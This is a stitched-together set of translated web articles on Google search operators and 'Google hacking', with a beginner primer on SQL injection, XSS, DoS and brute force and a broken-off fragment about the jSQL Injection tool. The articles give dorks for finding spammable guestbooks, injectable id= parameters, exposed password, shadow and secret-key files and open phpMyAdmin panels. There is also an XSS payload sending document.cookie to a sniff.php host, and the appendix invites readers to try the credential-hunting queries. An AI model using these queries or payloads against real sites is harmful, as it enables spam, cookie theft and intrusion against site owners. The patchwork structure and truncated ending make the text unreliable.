How to search correctly using google.com

Everyone probably knows how to use a search engine like Google =) But not everyone knows that a correctly composed query, built with a few special constructs, gets you to what you are looking for much more efficiently and quickly =) In this article I will try to show what you need to do to search properly.

Google supports several advanced search operators that have special meaning when searching on google.com. Typically these operators narrow the search, or even tell Google to do a completely different type of search. For example, link: is a special operator, and the query link:www.google.com will not run a normal search but will instead find all web pages that link to google.com. (Google has since retired some of these: link: stopped working in 2017 and cache: was removed in 2024; site:, intitle:, inurl:, intext: and filetype: still work.)

Alternative query types

cache: Shows Google's cached copy of the page. If you include other words in the query, Google will highlight those words within the cached document.
For example, cache:www.google.com web will show the cached content with the word "web" highlighted.

link: Shows web pages that contain links to the specified page.
For example, link:www.google.com will list all pages that have a link to http://www.google.com

related: Displays web pages that are "related" to the specified web page.
For example, related:www.google.com will list web pages similar to Google's home page.

info: Presents some of the information Google has about the page you request.
For example, info:website will show the information Google holds about our forum =) (Armada - Adult Webmasters Forum).

Other information requests

define: The define: query returns a definition of the words you enter after it, collected from various online sources. The definition is for the entire phrase entered (that is, it covers all the words in the exact query).

stocks: If you start a query with stocks:, Google treats the rest of the query terms as stock ticker symbols and links to a page with ready-made information for those symbols.
For example, stocks:intc yhoo will show information about Intel and Yahoo. (Note that you must type the ticker symbols, not the company names.)

Query Modifiers

site: If you include site: in your query, Google will limit the results to pages it finds in that domain.
You can also restrict the search to a top-level domain such as ru, org or com (site:com, site:ru).

allintitle: If you run a query with allintitle:, Google will limit the results to pages that have all the query words in the title.
For example, allintitle: google search will return the Google pages about search, such as Images, Blog Search, etc.

intitle: If you include intitle: in your query, Google will limit the results to documents containing that word in the title.
For example, intitle:Business

allinurl: If you run a query with allinurl:, Google will limit the results to pages that have all the query words in the URL.
For example, allinurl: google search will return documents with both google and search in the URL. Note that allinurl: works on words, not URL components, and ignores punctuation: allinurl: foo/bar finds pages with the words foo and bar somewhere in the URL, but does not require them to be separated by a slash.

inurl: If you include inurl: in your query, Google will limit the results to documents containing that word in the URL.
For example, Animation inurl:site

intext: Searches for the word only in the page text, ignoring the title, link text and other things outside the body. There is also a derivative of this modifier, allintext:, which applies the same restriction to every word in the query; this matters when frequently used words would otherwise be matched in links.
For example, intext:forum

daterange: Searches within a date range (daterange:2452389-2452389); the dates are given as Julian day numbers, not calendar dates.

And finally, all sorts of interesting example queries.

Example Google queries. For spammers (they locate guestbooks, journals, blogs and forums that accept posts from anyone; the same queries tell you whether your own site is on that list)

inurl:control.guest?a=sign

site:books.dreambook.com "Homepage URL" "Sign my" inurl:sign

site:www.freegb.net Homepage

inurl:sign.asp "Character Count"

"Message:" inurl:sign.cfm "Sender:"

inurl:register.php "User Registration" "Website"

inurl:edu/guestbook "Sign the Guestbook"

inurl:post "Post Comment" "URL"

inurl:/archives/ "Comments:" "Remember info?"

"Script and Guestbook Created by:" "URL:" "Comments:"

inurl:?action=add "phpBook" "URL"

intitle:"Submit New Story"

Journals

inurl:www.livejournal.com/users/ mode=reply

inurl:greatestjournal.com/ mode=reply

inurl:fastbb.ru/re.pl?

inurl:fastbb.ru/re.pl? "Guestbook"

Blogs

inurl:blogger.com/comment.g? "postID" "anonymous"

inurl:typepad.com/ "Post a comment" "Remember personal info?"

inurl:greatestjournal.com/community/ "Post comment" "addresses of anonymous posters"

"Post comment" "addresses of anonymous posters" -

intitle:"Post comment"

inurl:pirillo.com "Post comment"

Forums

inurl:gate.html? "name=Forums" "mode=reply"

inurl:"forum/posting.php?mode=reply"

inurl:"mes.php?"

inurl:"members.html"

inurl:forum/memberlist.php?

I decided to write a little about information security. The article will be useful to novice programmers and to those who have only just started front-end development. What's the problem?

Many novice developers get so carried away with writing code that they forget entirely about the security of their work, above all about vulnerabilities such as SQL injection and XSS. They also choose easy passwords for their admin panels and get brute-forced. What are these attacks and how do you avoid them?

SQL injection

SQL injection is the most common type of attack on a database; it is carried out through the SQL queries the application sends to its DBMS. Many people, and even large companies, suffer from such attacks. The cause is a developer error in how the database is used and, strictly speaking, in how the SQL queries are built.

SQL injection is possible because input data used in SQL queries is not handled correctly. If an attack succeeds, you risk losing not only the contents of the databases but also passwords and admin panel logins, and that is quite enough to take over the site completely or make irreversible changes to it.

The attack works against scripts written in PHP, ASP, Perl and other languages; its success depends on the DBMS in use and on how the script itself is written. There are many sites in the world vulnerable to SQL injection, and this is easy to verify: just enter "dorks", special queries for finding vulnerable sites. Here are some of them:

  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:article.php?ID=
  • inurl:play_old.php?id=
  • inurl:declaration_more.php?decl_id=
  • inurl:pageid=
  • inurl:games.php?id=
  • inurl:page.php?file=
  • inurl:newsDetail.php?id=
  • inurl:gallery.php?id=
  • inurl:article.php?id=

How do you use them? Just type them into Google or Yandex. The search engine gives you not a single vulnerable site but a whole list of pages whose URLs match the pattern. But we won't stop there: we want to make sure a page really is vulnerable. To do that, append a single quote ' to the value id=1 in the site's own URL, like this:

  • games.php?id=1'

If the site answers with an SQL error, the quote reached the database unescaped and the parameter is injectable. What does our attacker need next?

He needs that very link to the error page. Further work on the vulnerability usually takes place in the Kali Linux distribution with its utilities for this part: injecting code through the parameter and performing the required operations. How that is done I will not describe here, but information about it is easy to find on the Internet.
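The single-quote probe and the string-pasting bug behind it, as an added example that is not part of the original article: the schema, the table contents and the query are assumptions standing in for a games.php?id= page, and the database is an in-memory SQLite so it runs offline. The vulnerable function builds the SQL by string formatting, exactly the mistake the text describes; the safe function binds the value as a parameter, so the same inputs produce no error and no bypass.

```python
import sqlite3

# Constructed in-memory stand-in for a site's database (assumed schema, not from the page).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE games (id INTEGER PRIMARY KEY, title TEXT, hidden INTEGER)")
    conn.executemany("INSERT INTO games VALUES (?, ?, ?)",
                     [(1, "Chess", 0), (2, "Go", 0), (3, "Unreleased title", 1)])
    return conn

def lookup_vulnerable(conn, game_id):
    """The pattern behind games.php?id=: the raw parameter is pasted into the SQL text."""
    sql = f"SELECT id, title FROM games WHERE id = {game_id} AND hidden = 0"
    return conn.execute(sql).fetchall()

def lookup_safe(conn, game_id):
    """Same query with a bound parameter: the input is data, never SQL syntax."""
    sql = "SELECT id, title FROM games WHERE id = ? AND hidden = 0"
    return conn.execute(sql, (game_id,)).fetchall()

def probe(conn, lookup, value):
    """Run one request the way the site would and report what it shows: rows or a DB error.
    The single-quote probe from the text produces an error only on the vulnerable version."""
    try:
        return ("rows", lookup(conn, value))
    except sqlite3.Error as exc:
        return ("error", str(exc))

if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1'", "1 OR 1=1 --"):
        print(f"id={value!r:16} vulnerable -> {probe(db, lookup_vulnerable, value)}")
        print(f"id={value!r:16} safe       -> {probe(db, lookup_safe, value)}")
```

The third input shows why the error matters: once the quote proves the value reaches the parser unescaped, "1 OR 1=1 --" comments out the hidden = 0 condition and returns every row, including the one the site meant to keep private. The parameterized version returns nothing for both probes, because the whole string is compared against the integer id column and never becomes SQL.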

XSS Attack

This kind of attack targets, above all, cookies. Users love to keep them, and why not? Thanks to cookies we don't have to type the password for Vk.com or Mail.ru a hundred times, and few people give them up. But on the Internet a rule often holds for attackers: the convenience coefficient is directly proportional to the insecurity coefficient.

To carry out an XSS attack the attacker needs JavaScript. At first glance the language looks simple and harmless, because it has no access to the machine's resources: the attacker can only run JavaScript inside the browser. But that is enough, because the whole point is to get the code into the web page, where it runs with the rights of the site and of the logged-in user.

I will not describe the attack process in detail, only the basics of how it happens.

An attacker can post JS code to some forum or guest book:

document.location.href = "http://192.168.1.7/sniff.php?test"

This script redirects every visitor to the attacker's page, where the real code runs, whether a sniffer that logs what arrives, some kind of storage, or an exploit, and steals the visitor's cookies.

Why JavaScript? Because JavaScript is good at making web requests and has access to cookies. But if the script sends the user to another site, the user will easily notice. So the attacker uses a more cunning option: he loads an image whose URL carries the cookie.

img = new Image();
img.src = "http://192.168.1.7/sniff.php?" + document.cookie;

We simply create an image object and set its address to our collecting script with the cookie appended; the browser makes the request without showing anything.

How to protect yourself from all this? Not clicking suspicious links only helps against reflected XSS, where the payload is in the link. Stored XSS like the guest-book example above hits every visitor of a legitimate page, so the fix has to be on the server: escape user-supplied text when it is rendered into HTML, and set the HttpOnly flag on session cookies so document.cookie cannot read them.
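The stored guest-book case above, as an added example that is not part of the original article: the two entries are constructed (the second wraps the page's image trick in a script tag), and the page template, cookie name and flags are assumptions. It shows the same entries rendered by a guest book that pastes them straight into HTML and by one that escapes them, and a Set-Cookie header with HttpOnly set so that the stolen document.cookie would not contain the session.

```python
import html
import re

# Constructed guest-book entries; the second carries the cookie-stealing image trick from the text.
ENTRIES = [
    "Nice forum, thanks!",
    '<script>img=new Image();img.src="http://192.168.1.7/sniff.php?"+document.cookie;</script>',
]

def render_vulnerable(entries):
    """Guest-book page that pastes each entry straight into the HTML (the bug)."""
    return "\n".join(f"<p>{entry}</p>" for entry in entries)

def render_escaped(entries):
    """Same page with output encoding: <, >, &, and quotes become entities, so the browser
    shows the payload as text instead of running it."""
    return "\n".join(f"<p>{html.escape(entry, quote=True)}</p>" for entry in entries)

# Rough detector for live markup surviving in a rendered page; used here only to show the
# difference between the two renderers, not as a defence in itself.
ACTIVE_MARKUP = re.compile(r"<\s*(script|img|iframe|svg|object)\b|\bon\w+\s*=", re.I)

def contains_active_markup(page):
    return ACTIVE_MARKUP.search(page) is not None

def session_cookie_header(session_id):
    """HttpOnly hides the cookie from document.cookie; Secure and SameSite limit where it is sent."""
    return f"Set-Cookie: session={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/"

def cookie_readable_by_script(set_cookie_header):
    """True if a script injected into the page could read this cookie via document.cookie."""
    attributes = [part.strip().lower() for part in set_cookie_header.split(";")[1:]]
    return "httponly" not in attributes

if __name__ == "__main__":
    print(render_vulnerable(ENTRIES))
    print(render_escaped(ENTRIES))
    print(session_cookie_header("5f3a"))
```

Escaping at output time is the general fix because it does not depend on guessing every payload shape; HttpOnly is the second layer, so that even if a script does run it has nothing worth sending to sniff.php.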

DoS and DDoS Attacks

DoS (from the English Denial of Service) is an attack on a computer system whose goal is to make it fail: to create conditions under which legitimate users cannot reach the system's resources (servers), or can reach them only with difficulty. A crash can also be a step toward taking the system over, if in the emergency the software leaks something critical, such as its version or part of its code. But most often it is a means of economic pressure: downtime of a revenue-generating service, the provider's bills and the cost of countermeasures all hit the target in the pocket. DoS and DDoS attacks are currently the most popular kind, because they can bring almost any system down while leaving little legally usable evidence.

What is the difference between a DoS and a DDoS attack?

A DoS attack is constructed cleverly. For example, if a server does not validate incoming packets, an attacker can craft a request that takes forever to process, leaving no processor time for other connections; clients are then denied service. But large well-known sites cannot be overloaded or taken down this way: they have wide channels and very powerful servers that cope with such loads without trouble.

DDoS is essentially the same attack as DoS, but where DoS has a single source of requests, DDoS has hundreds or more. Even very powerful servers may not cope with that load. An example:

A DoS attack is when you are having a conversation and some ill-mannered person comes up and starts shouting; talking becomes hard or impossible. Solution: call security, who calm the person down and remove him from the room. A DDoS attack is when a crowd of thousands of such people rushes in; security cannot tie up and carry out all of them.

DoS and DDoS are launched from so-called zombie computers: machines belonging to users who have been hacked and have no idea their computer is taking part in an attack on some server.

How to protect yourself? Completely, you cannot. But you can make the attacker's job harder: choose a hosting provider with powerful servers and enough capacity (and traffic filtering) to absorb the load.

Bruteforce attack

A developer can build many protection systems, fully review the scripts he has written, check the site for vulnerabilities and so on. But at the last step of putting the site together, simply setting the admin panel password, he may forget about one thing: the password itself!

Setting a simple password is strongly discouraged: 12345, 1114457, vasya111 and the like. Passwords shorter than 10-11 characters are not recommended either. Otherwise you may fall to the most common and least sophisticated attack: brute force.

Brute force is a password-guessing attack run by special programs against dictionaries. Dictionaries vary: Latin letters, numbers enumerated up to some range, mixed (Latin + numbers), and there are even dictionaries with special characters @#4$%&*~`'"\? and so on.

This type of attack is easy to avoid, of course: just pick a complex password. Even a captcha can save you, and if your site runs on a CMS, many of them detect this attack and block the offending IP. Always remember: the more distinct characters a password contains, the harder it is to guess.

How do attackers work? In most cases they suspect or know part of the password in advance. It is logical to assume that a password will not consist of 3 or 5 characters, since such passwords get broken all the time. So attackers typically take a range of 5 to 10 characters and add the few characters they may already know; then passwords over the required ranges are generated. The Kali Linux distribution even ships programs for this. And voilà: the attack no longer takes long, because the dictionary is no longer so large. On top of that an attacker can use the power of a video card: some tools support CUDA, and the search speed grows by a factor of 10 or more. So we see that this simple attack is entirely real, and it is not only websites that get brute-forced.
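The two sides of the brute-force argument above, as an added example that is not part of the original article: the size of the search space as a function of character set and length range (including how much a known prefix removes), and the per-IP lockout a CMS applies so that guesses against a web login run at a few per second rather than at GPU speed. The character-class sizes are standard; the 5-failures-per-10-minutes policy, the IP addresses and the guess rates are assumptions.

```python
from collections import defaultdict

# Size of each character class an attacker's dictionary might enumerate.
CHARSET_SIZES = {"digits": 10, "lowercase": 26, "lowercase+digits": 36,
                 "mixed case+digits": 62, "all printable ASCII": 95}

def keyspace(charset_size, min_len, max_len):
    """Number of candidates when every length from min_len to max_len is tried."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))

def keyspace_with_known_prefix(charset_size, total_len, known_chars):
    """The text's point: knowing some characters up front shrinks the search to the rest."""
    return charset_size ** (total_len - known_chars)

def seconds_to_exhaust(candidates, guesses_per_second):
    return candidates / guesses_per_second

class LoginThrottle:
    """Per-IP lockout of the kind a CMS applies: after `limit` failed logins inside `window`
    seconds the address is refused until old failures age out. Hypothetical policy values."""

    def __init__(self, limit=5, window=600):
        self.limit = limit
        self.window = window
        self._failures = defaultdict(list)

    def allowed(self, ip, now):
        recent = [t for t in self._failures[ip] if now - t < self.window]
        self._failures[ip] = recent
        return len(recent) < self.limit

    def record_failure(self, ip, now):
        self._failures[ip].append(now)

if __name__ == "__main__":
    for name, size in CHARSET_SIZES.items():
        # 1e9 guesses/s is a GPU-class rate against a fast unsalted hash (assumed figure);
        # a throttled web login allows a handful per second, which is the point of the lockout.
        print(f"{name:20} len 8: {seconds_to_exhaust(keyspace(size, 8, 8), 1e9):>12.0f} s on a GPU")
    t = LoginThrottle()
    for i in range(6):
        print("attempt", i + 1, "allowed:", t.allowed("10.0.0.1", now=i))
        t.record_failure("10.0.0.1", now=i)
```

The comparison to draw from the numbers: an 8-character lowercase password is gone in minutes offline, while the same password behind a lockout of five tries per ten minutes cannot be exhausted in any useful time, which is why both a long password and server-side throttling are needed.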

Dear developers, never forget about information security, because today many people, including states, suffer from these kinds of attacks. After all, the biggest vulnerability is a person, who can always get distracted or miss something. We are programmers, not programmed machines. Always be on guard, because losing information can have serious consequences!

Hacking with Google

Alexander Antipov

The Google search engine (www.google.com) provides many search options. All of them are an invaluable tool for a user new to the Internet, and at the same time an even more powerful weapon of intrusion and destruction in the hands of people with ill intent, including not only hackers but also non-computer criminals and even terrorists.


Denis Barankov
denisNOSPAMixi.ru

Attention: this article is not a guide to action. It was written for you, WEB server administrators, so that you lose the false feeling of being safe, finally understand how insidious this method of gathering information is, and get on with protecting your site.

Introduction

For example, I found 1670 pages in 0.14 seconds!

2. Enter another line, for example:

inurl:"auth_user_file.txt"

Somewhat fewer results, but already enough for downloading the files and cracking the passwords offline (with John the Ripper, for instance). More examples follow below.

So, you need to realize that Google has visited most sites on the Internet and cached their contents. That cache lets you learn about a site and its content without ever connecting to it, purely by digging through what Google has stored. Moreover, if information has since been removed from the site, a copy may still survive in the cache. All this method needs is knowledge of a few Google keywords. The technique is called Google Hacking.

Information about Google Hacking first appeared on the Bugtraq mailing list three years ago. In November 2001 a French student raised the topic; here is a link to the message: http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. It gives the first examples of such queries:

1) Index of /admin
2) Index of /password
3) Index of /mail
4) Index of / +banques +filetype:xls (for france...)
5) Index of / +passwd
6) Index of / password.txt

This topic made waves in the English-speaking part of the Internet quite recently, after Johnny Long's article published on May 7, 2004. For a fuller study of Google Hacking I recommend the author's site http://johnny.ihackstuff.com. In this article I just want to bring you up to date.

Who can use this:
- Journalists, spies and all those people who like to poke their nose into other people's business can use this to search for incriminating evidence.
- Hackers looking for suitable targets for hacking.

How Google works.

To continue the conversation, let me remind you of some of the keywords used in Google queries.

Search using the + sign

Google drops words it considers unimportant from a search: question words, prepositions and articles in English, for instance are, of, where. In Russian Google seems to treat every word as important. When a word is dropped, Google says so. To force Google to search for pages containing such a word, put a + directly before it, with no space. For example:

ace +of base

(Google removed the + operator in 2011; today you put the word in double quotes instead: ace "of" base.)

Search using the - sign

If Google returns a large number of pages and you need to drop those on a certain topic, you can force Google to return only pages that do not contain particular words. Put a - directly before each such word, with no space. For example:

fishing -vodka

Search using ~

You may want to search not only the specified word, but also its synonyms. To do this, precede the word with the ~ symbol.

Finding an exact phrase using double quotes

Google looks on each page for all the words you typed into the query and does not care about their relative position, as long as all of them appear on the page (this is the default). To find an exact phrase, put it in quotes. For example:

"book stand"

For at least one of several words to appear, you must state the logical operation explicitly: OR. For example:

book safety OR protection

In addition, you can use * in the query to stand for any word and . to stand for any character.

Searching for words using additional operators

Search operators are written in the query string in the form:

operator:search_term

No space goes next to the colon. With a space after the colon you get an error message; with a space before it Google treats the text as an ordinary search term.
There are groups of additional operators: language (which language the results should be in), date (limit results to the past three, six or twelve months), occurrences (where in the document to look for the string: anywhere, in the title, in the URL), domains (search only a given site or, conversely, exclude it) and safe search (drop sites with the specified kind of content from the results).
Some operators need no further parameter; for instance "cache:www.google.com" is a complete query on its own. Others require a search term, such as "site:www.google.com help". For our topic, the following operators matter:

Operator        Description                                                   Requires additional parameter?
site:           search only on the site specified in search_term              yes
filetype:       search only in documents of type search_term                  yes
intitle:        find pages containing search_term in the title                yes
allintitle:     find pages containing all search_term words in the title      yes
inurl:          find pages containing the word search_term in their address   yes
allinurl:       find pages containing all search_term words in their address  yes

The site: operator restricts the search to the given site; you can specify an IP address as well as a domain name. For example:

site:www.google.com help

The filetype: operator restricts the search to a specific file type. For example:

filetype:xls

As of the publication date of the article, Google can search within 13 different file formats:

  • Adobe Portable Document Format (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
  • Lotus WordPro (lwp)
  • MacWrite (mw)
  • Microsoft Excel(xls)
  • Microsoft PowerPoint (ppt)
  • Microsoft Word(doc)
  • Microsoft Works (wks, wps, wdb)
  • Microsoft Write (wri)
  • Rich Text Format (rtf)
  • Shockwave Flash(swf)
  • Text (ans, txt)

The link: operator shows all pages that point to the specified page.
It is always interesting to see how many places on the Internet know about you. Let's try:

link:www.google.com

The cache: operator shows the version of a page in Google's cache, as it looked the last time Google visited it. Take any frequently changing site and look:

cache:www.google.com

The intitle: operator searches for the specified word in the page title. The allintitle: operator extends it: all the specified words must appear in the title. Compare:

intitle:flight to Mars
intitle:flight intitle:on intitle:mars
allintitle:flight to mars

The inurl: operator makes Google show every page whose URL contains the given string; allinurl: requires all the words to appear in the URL. For example:

allinurl:acid acid_stat_alerts.php

This query is handy for anyone who does not run Snort themselves: it turns up ACID consoles (the web front end for Snort alerts) on real systems, so you can at least see what one looks like.

Hacking Methods Using Google

So we have established that by combining the operators and keywords above, anyone can begin collecting information and looking for vulnerabilities. These techniques are commonly called Google Hacking.

Site map

You can use site: to list every link Google has found on a site. Pages generated dynamically by scripts are usually not indexed with their parameters, so some sites use ISAPI filters (or URL rewriting) to publish links not as /article.asp?num=10&dst=5 but with slashes, /article/abc/num/10/dst/5, so that search engines index the whole site.

Let's try:

site:www.whitehouse.gov whitehouse

Google assumes that every page on the site contains the word whitehouse, which is what we use to pull out all its pages.
There is also a simpler form:

site:whitehouse.gov

And the best part is that the people at whitehouse.gov never learn that we examined the structure of their site and even read the cached pages Google downloaded: nothing touched their server. This can be used to study a site's structure and content while remaining undetected, at least for now.

View a list of files in directories

WEB servers can return a listing of a directory instead of an HTML page. This is sometimes done on purpose so users can pick and download specific files; but in many cases the administrator never intended to expose a directory's contents, and the listing appears because of a misconfiguration or a missing index page. As a result an attacker has a chance to find something useful in the directory. Finding such pages is easy once you notice that their title contains the words Index of. Since those words also appear on unrelated pages, the query is refined with keywords from the listing itself:

intitle:index.of parent directory
intitle:index.of name size

Since most directory listings are intentional, you may have trouble finding misplaced listings at first. But the listings alone already let you determine WEB server versions, as described below.

Obtaining the WEB server version.

Knowing the WEB server version is always useful before launching any attack. Again, thanks to Google, you can obtain it without connecting to the server: look closely at a directory listing and you will see the server name and version in its footer:

Apache/1.3.29 - ProXad Server at trf296.free.fr Port 80

An experienced administrator can change this string, but as a rule it is genuine. So to collect such information it is enough to send the query:

intitle:index.of server.at

To get information for a specific server, we clarify the request:

intitle:index.of server.at site:ibm.com

Or vice versa, we are looking for servers running a specific version of the server:

intitle:index.of Apache/2.0.40 Server at

An attacker can use this to pick a victim: if he has an exploit for a particular WEB server version, he can find servers running that version and try it.

You can also learn the server version from the pages installed by default with a fresh WEB server. For example, to see the Apache 1.2.6 test page, just type

intitle:Test.Page.for.Apache it.worked!

Moreover, some operating systems install and start a WEB server during setup without the user even being aware of it. Naturally, if you see that someone has not removed the default page, it is reasonable to assume the machine has had no hardening at all and is likely vulnerable.

Try searching for IIS 5.0 pages:

allintitle:Welcome to Windows 2000 Internet Services

In the case of IIS you can determine not only the server version but also the Windows version and service pack.

Another way to determine the WEB server version is to search for manuals (help pages) and examples that may be installed on the site by default. Attackers have found quite a few ways to use these components to gain privileged access to a site, which is why they must be removed from production servers, quite apart from the fact that their presence reveals the server type and version. For example, let's find the Apache manual:

inurl:manual apache directives modules
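The two checks described above (is this an "Index of" page, and what does its footer say about the server), as an added example that is not part of the original article: a parser for the Apache default listing format run over a constructed page. The footer layout "Apache/<version> (<os>) Server at <host> Port <port>" follows the example line in the text; the host name, directory and file names are made up. The same routine is what you would run against your own site's listings to see what Google has been shown.

```python
import re

# Constructed directory listing in the Apache default format shown in the text (the footer
# "Apache/<version> Server at <host> Port <port>"); the host and files are made up.
SAMPLE_LISTING = """<html><head><title>Index of /backup</title></head><body>
<h1>Index of /backup</h1><pre><a href="?C=N;O=D">Name</a> <a href="?C=S;O=A">Size</a>
<a href="/">Parent Directory</a>
<a href="site.sql">site.sql</a>          2004-05-07 12:00  4.1M
<a href="ws_ftp.ini">ws_ftp.ini</a>      2004-05-07 12:01  2.3K
<a href="readme.txt">readme.txt</a>      2004-05-07 12:02  311
</pre><address>Apache/2.0.40 (Red Hat Linux) Server at www.example.com Port 80</address>
</body></html>"""

TITLE_RE = re.compile(r"<title>\s*Index of\s+(?P<path>[^<\s]+)", re.I)
BANNER_RE = re.compile(
    r"(?P<server>[A-Za-z-]+/[\w.]+)(?:\s+\([^)]*\))?\s+Server at\s+(?P<host>[^\s<]+)\s+Port\s+(?P<port>\d+)",
    re.I)
FILE_RE = re.compile(r'<a href="([^"?/][^"]*)">')   # skip sort links (?C=...) and absolute paths

# File names worth a second look when they turn up in a listing; several of these are exactly
# what the queries at the end of the article hunt for.
SENSITIVE_HINTS = (".sql", ".bak", ".ini", ".conf", "passwd", "pwd.db", ".pgp", "mysql_history", ".log")

def parse_listing(page):
    """Return path, server banner and file names from an 'Index of' page, or None if it is not one."""
    title = TITLE_RE.search(page)
    if not title:
        return None
    info = {"path": title.group("path"), "server": None, "host": None, "port": None}
    banner = BANNER_RE.search(page)
    if banner:
        info["server"] = banner.group("server")
        info["host"] = banner.group("host")
        info["port"] = int(banner.group("port"))
    info["files"] = FILE_RE.findall(page)
    return info

def flag_sensitive(files):
    return [f for f in files if any(hint in f.lower() for hint in SENSITIVE_HINTS)]

if __name__ == "__main__":
    listing = parse_listing(SAMPLE_LISTING)
    print(listing)
    print("worth checking:", flag_sensitive(listing["files"]))
```

The banner is only as honest as the ServerTokens setting, as the text notes; the listing itself, though, is authoritative about what the directory exposes, which is why the file check is the more useful half when auditing your own server.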

Using Google as a CGI scanner.

A CGI scanner, or WEB scanner, is a utility that looks for vulnerable scripts and programs on a target server. Such utilities need to know what to look for, so they carry a whole list of known-vulnerable files, for example:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

Each of these files can be found with Google by combining the words index of or the inurl: operator with the file name; this way we find sites carrying vulnerable scripts, for example:

allinurl:/random_banner/index.cgi

With the right additional knowledge, an attacker can exploit such a script to make it return any file stored on the server, a password file for example.

How to protect yourself from Google hacking.

1. Do not put sensitive data on the WEB server.

Even if you post the data temporarily, you may forget about it, or someone may find and copy it before you delete it. Don't do it. There are many other ways to transfer data that protect it from theft.

2. Check your site.

Use the methods described here to examine your own site. Check it periodically for new techniques as they appear on http://johnny.ihackstuff.com. Remember that if you want to automate this, you need Google's explicit permission: http://www.google.com/terms_of_service.html says "You may not send automated queries of any sort to Google's system without express permission in advance from Google."

3. You may not need Google to index your site, or part of it.

Google lets you remove a link to your site or part of it from its index, and remove pages from the cache. You can also prohibit image search on your site and prevent short page snippets from being shown in results. All the removal options are described at http://www.google.com/remove.html. To use them you must confirm that you really own the site, or insert the appropriate tags into the page.

4. Use robots.txt

Search engines read the robots.txt file at the root of the site and do not index the parts marked Disallow. You can use this to keep part of the site out of the index. For example, to keep the entire site out, create a robots.txt containing two lines:

User-agent: *
Disallow: /

Bear in mind that robots.txt is itself public and only advisory: every Disallow line tells a reader exactly which paths you consider sensitive, and a crawler that ignores the file still reaches them. Keep private material behind authentication rather than relying on the file.
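How a well-behaved crawler applies the file above, as an added example that is not part of the original article: a small robots.txt parser implementing the plain prefix rules (longest matching rule wins, Allow wins a tie, which is the evaluation Google documents), run over a constructed file whose paths are made up. The advertised_paths function makes the caveat concrete: the Disallow lines are a ready-made list of what the site owner wants hidden.

```python
# Constructed robots.txt for the demonstration; the paths are made up.
SAMPLE_ROBOTS = """# keep crawlers out of the admin and backup areas
User-agent: *
Disallow: /admin/
Disallow: /backup/
Allow: /admin/public/

User-agent: badbot
Disallow: /
"""

def parse_robots(text):
    """Group Allow/Disallow lines under their User-agent(s). Returns {agent: [(rule, path), ...]}.
    Wildcards (* and $ inside paths) are not handled; this is the plain prefix form of the file."""
    groups, current, collecting = {}, [], False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip().lower(), value.strip()
        if key == "user-agent":
            if not collecting:          # a new block starts after the previous block's rules
                current = []
            current.append(value.lower())
            groups.setdefault(value.lower(), [])
            collecting = True
        elif key in ("allow", "disallow") and value:   # an empty Disallow permits everything
            collecting = False
            for agent in current:
                groups[agent].append((key, value))
    return groups

def is_allowed(groups, agent, path):
    """Longest matching rule wins; on a tie Allow wins. No matching rule means allowed."""
    rules = groups.get(agent.lower(), groups.get("*", []))
    best = None
    for rule, prefix in rules:
        if path.startswith(prefix) and (best is None or len(prefix) > len(best[1])
                                        or (len(prefix) == len(best[1]) and rule == "allow")):
            best = (rule, prefix)
    return best is None or best[0] == "allow"

def advertised_paths(groups):
    """Every Disallow path: what the file tells any reader you would rather hide."""
    return sorted({path for rules in groups.values() for rule, path in rules if rule == "disallow"})

if __name__ == "__main__":
    g = parse_robots(SAMPLE_ROBOTS)
    for agent, path in (("Googlebot", "/admin/config.php"), ("Googlebot", "/admin/public/x.html"),
                        ("badbot", "/index.html")):
        print(agent, path, "allowed" if is_allowed(g, agent, path) else "blocked")
    print("paths the file advertises:", advertised_paths(g))
```

A crawler that identifies itself as badbot is kept out of everything only because it chooses to obey; the file has no way to enforce the rule, which is the whole reason the text's point 1 (do not put the data there at all) comes first.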

What else happens

To make life a little less sweet, I'll add in closing that there are sites which monitor people who use the methods described above to hunt for holes in scripts and WEB servers. An example of such a page is

Appendix.

A little sweet. Try some of the following yourself:

1. #mysql dump filetype:sql - search for MySQL database dumps
2. Host Vulnerability Summary Report - shows you what vulnerabilities other people have found
3. phpMyAdmin running on inurl:main.php - open phpMyAdmin control panels
4. not for distribution confidential
5. Request Details Control Tree Server Variables
6. Running in Child mode
7. This report was generated by WebLog
8. intitle:index.of cgiirc.config
9. filetype:conf inurl:firewall -intitle:cvs - maybe someone needs firewall configuration files? :)
10. intitle:index.of finances.xls - hmm...
11. intitle:Index of dbconvert.exe chats - ICQ chat logs
12. intext:Tobias Oetiker traffic analysis
13. intitle:Usage Statistics for Generated by Webalizer
14. intitle:statistics of advanced web statistics
15. intitle:index.of ws_ftp.ini - WS_FTP config (contains saved passwords)
16. inurl:ipsec.secrets holds shared secrets - secret keys, a good find
17. inurl:main.php Welcome to phpMyAdmin
18. inurl:server-info Apache Server Information
19. site:edu admin grades
20. ORA-00921: unexpected end of SQL command - reveals paths
21. intitle:index.of trillian.ini
22. intitle:Index of pwd.db
23. intitle:index.of people.lst
24. intitle:index.of master.passwd
25. inurl:passlist.txt
26. intitle:Index of .mysql_history
27. intitle:index of intext:globals.inc
28. intitle:index.of administrators.pwd
29. intitle:Index.of etc shadow
30. intitle:index.of secring.pgp
31. inurl:config.php dbuname dbpass
32. inurl:perform filetype:ini


    Run the downloaded file by double clicking (you need to have virtual machine ).

    3. Anonymity when checking a site for SQL injection
    Setting up Tor and Privoxy in Kali Linux

    [Section under development]

    Setting up Tor and Privoxy on Windows

    [Section under development]

    Proxy settings in jSQL Injection

    [Section under development]

    4. Checking a site for SQL injection with jSQL Injection

    Working with the program is extremely simple: enter the website address and press ENTER.

    The following screenshot shows that the site is vulnerable to three types of SQL injection at once (they are listed in the lower right corner). Clicking an injection name switches the method in use:

    The databases that were found have also already been listed for us.

    You can view the contents of each table:

